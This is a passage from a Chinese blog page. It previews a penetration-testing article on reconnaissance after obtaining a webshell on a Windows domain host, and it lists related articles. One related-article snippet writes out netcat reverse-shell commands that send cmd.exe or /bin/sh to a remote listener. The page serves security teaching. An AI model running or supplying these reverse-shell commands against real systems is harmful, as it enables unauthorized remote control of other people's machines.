渗透的本质是信息搜集(第一季)

最新推荐文章于 2024-07-25 22:59:42 发布
最新推荐文章于 2024-07-25 22:59:42 发布
阅读量8.2k 收藏 16
点赞数 10
分类专栏: php安全新闻早八点
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/micropoor/article/details/79400904
版权
本文探讨了渗透测试中信息搜集的关键性,通过一个故事强调了并非所有提权都依赖于exploit,而是依赖于对目标系统信息的深入理解。提权的本质在于全面收集如服务软件、杀毒软件配置等信息,以便找到可能的利用点。
摘要由CSDN通过智能技术生成
目标资产信息搜集的程度,决定渗透过程的复杂程度。
目标主机信息搜集的深度,决定后渗透权限持续把控。
渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。
----Micropoor
文章将连载,从几方面论证, 渗透的本质是信息搜集。
一次完整的网络渗透,不仅仅是与目标管理人员的权限争夺,一次完整的网络渗透,它分为两大块, 技术业务信息分析业务
技术业务要辅助并且要为信息分析业务提供强大的支撑与保证。同时 信息分析业务要为技术业务提供关键的目标信息分析逻辑关系与渗透方向
案例如下:( 非root/administrator下主动信息搜集)(有马赛克)
在得到一个webshell时,非root/administrator情况下对目标信息搜集至关重要,它会影响后期的渗透是否顺利,以及渗透方向。
目标主机分配了2个内网IP,分别为10.0.0.X与192.168.100.X

得知部分服务软件,以及杀毒软件 NOD32,一般内网中为杀毒为集体一致。


搜集补丁更新频率,以及系统 状况


搜集安装软件以及版本,路径等。


域中用户如下。并且当前权限为 iis apppool\xxxx

正如上面所说,技术业务需要辅助分析业务。在域组中,其中有几个组需要特别关注,在一般的大型内网渗透中,需要关注大致几个组
(1)I
最低0.47元/天 解锁文章
micropoor
关注
专栏目录
渗透本质信息搜集(第五十二课))1
08-03
在第五十二课中,我们探讨了渗透本质——信息搜集信息搜集渗透测试中的核心环节,因为它决定了整个过程的复杂性和成功可能性。深入理解目标资产的信息,有助于规划渗透策略,确定攻击路径,以及提升权限控制的...
渗透,持续渗透,后渗透本质
03-24
渗透本质信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。持续渗透本质是线索关联,而线索关联为后续的攻击链方提供了强大的方向。后渗透本质是权限把控,而权限把控为后渗透提供了以牺牲时间换取空间强大基础。
【HACK】第二阶段 web安全篇1——信息收集
weixin_42324313的博客
09-03 945
信息收集 0x01域名信息收集 1.域名介绍 域名(Domain name)是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输是标识计算机的电子方位。 浏览网站的过程: 个人电脑(浏览器)——> DNS服务器——>个人电脑(获得ip)——> 访问目标网站 2.Whois介绍 whois用来查询域名的IP以及所有者等信息的传输协议。 不同...
信息收集
最新发布
2301_80928446的博客
07-25 674
信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进行。比如目标站点IP、中间件、脚本语言、端口、邮箱等。
渗透本质信息收集(持续更新中)
aichenkao9206的博客
03-05 180
渗透本质信息收集(持续更新中) 简介 信息收集分为主动信息搜集和被动信息搜集。 主动信息收集(与目标进行直接交互) 被动信息收集(不与目标进行直接交互) whois 站长工具 http://whois.chinaz.com/ 子域名 目标IP 绕过CDN找真实IP nslookup 国外冷门DNS 209.244.0.3 64.6.64.6 8.8.8.8 9.9.9.9...
渗透本质信息收集-windows篇
公众号:乌云安全
03-16 1052
信息广度收集: Whois信息 站长之家:http://whois.chinaz.com Bugscaner:http://whois.bugscaner.com 国外在线:https://bgp.he.net 一级域名 企查查:https://www.qichacha.com 天眼查:https://www.tianyancha.com 爱企查:https://aiqicha.baidu.com 子域名 OneForAll:https://github.com/shmilylty/OneF
渗透测试之信息收集篇(含思维导图)
热门推荐
清泪的博客
08-14 1万+
TXT记录一般指为某个主机名或域名设置的说明,如:2)mail IN TXT "邮件主机, 存放在xxx ,管理人:AAA",Jim IN TXT "contact: abc@mailserver.com"也就是您可以设置 TXT ,以便使别人联系到您。如何检测TXT记录?1、进入命令状态;(开始菜单 - 运行 - CMD[回车]);2、输入命令" nslookup -q=txt 这里填写对应的域名或二级域名",查看返回的结果与设置的是否一致即可。......
渗透本质信息搜集(第1季)
01-01
渗透测试过程中,信息搜集是第一步,也是最重要的一步。只有通过信息搜集,我们才能了解目标系统的安全 posture,并确定攻击的方向。信息搜集的广度和深度决定了渗透测试的复杂程度和权限的获取。 在渗透测试中,...
渗透本质信息搜集(第2季)
01-01
渗透本质信息搜集(第2季)
渗透本质信息搜集(第五十二课)).docx
09-15
根据给定文件的描述,本文将深入探讨渗透测试的核心——信息搜集的重要性,并通过具体案例来阐述这一观点。 #### 二、信息搜集的重要性 1. **目标资产信息搜集**:这是渗透测试的基础步骤,涉及到目标系统的初步...
PHP安全新闻早8点特别篇
03-31
PHP安全新闻早8点特别篇-----ASP代码安全审计
渗透测试之信息搜集
a15929748502的博客
04-03 795
可以说信息搜集渗透测试相当重要的一步,占到整个测试时间的50%-70%。 (1)域名搜集 对应的IP: 子域名收集:大的集团大多都有子域名(子站),当主站不好攻击的时候,就可以用子域名做切入点,在子域中找出不太安全的站进行攻击,如比较老的子站。可以用Layer等工具。 whois:根据已知的域名进行反查,分析出此域名的注册人(企业),邮箱,电话等,可以用站长工具查询。(当这个站本身安全性...
渗透信息收集
内心不种满鲜花就会长满杂草
04-11 4673
目录 1. 获取目标机器的分区情况 2. 判断是否为虚拟机 3.查看目标机开启哪些服务 4. 查看目标安装了哪些应用及其版本以及补丁 5. 查看共享文件 6. 获取目标主机最近的系统操作 接上一篇文章我们获取了一个shell并提升为system权限后 -》Windows后渗透之权限提升,接下来进行信息收集,或者先信息收集在提权都行。meterpreter该工具具有多重功能,使后续的渗透变得更加容易。获取目标机的meterpreter shell后,就进入了后期渗透利用阶段,后期渗透模块有2..
渗透技巧】资产探测及信息收集
03-24 1万+
一、前言 在众测中,基本上SRC的漏洞收集范围有如下几种形式: 形式一:暂时仅限以下系统:www.xxx.com,其他域名不在此次测试范围内 形式二:只奖励与*.xxx.com相关的漏洞 形式三:无限制 形式一,基本被限定了范围 形式二,注重于子域名的收集 形式三,子域名及相关域名的收集 另外,随着企业内部业务的不断壮大,各种业务平台和管理系统越来越多,很多单位往往存在着“隐形资产”,...
渗透之内网信息收集
weixin_30401605的博客
07-11 252
内网域渗透的先决条件 首先你要能拿下一台域内的机器,然后才能开始域渗透。道理很简单,就不啰嗦了。介绍一些windows反弹shell的方法: .\nc.exe -e cmd.exe 192.168.1.1 4444 .\nc 192.168.1.1 4444 -e /bin/sh nc -l 4444 -vvv 内网穿外网 方案一 正想开口等连接 .\lcx.exe -...
/etc/passwd详解
02-27 207
root:x:0:0:root:/root:/bin/bash  bin:x:1:1:bin:/bin:/sbin/nologin  daemon:x:2:2:daemon:/sbin:/sbin/nologin  desktop:x:80:80:desktop:/var/lib/menu/kde:/sbin/nologin  mengqc:x:500:500:men...
渗透测试前期打点之企业资产收集
Thunderclap的博客
03-03 1333
渗透测试前期打点之企业资产收集
渗透测试——信息收集(超详细)
qq_62291388的博客
04-23 3056
该篇详细记录了渗透测试的前期——信息收集讲解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值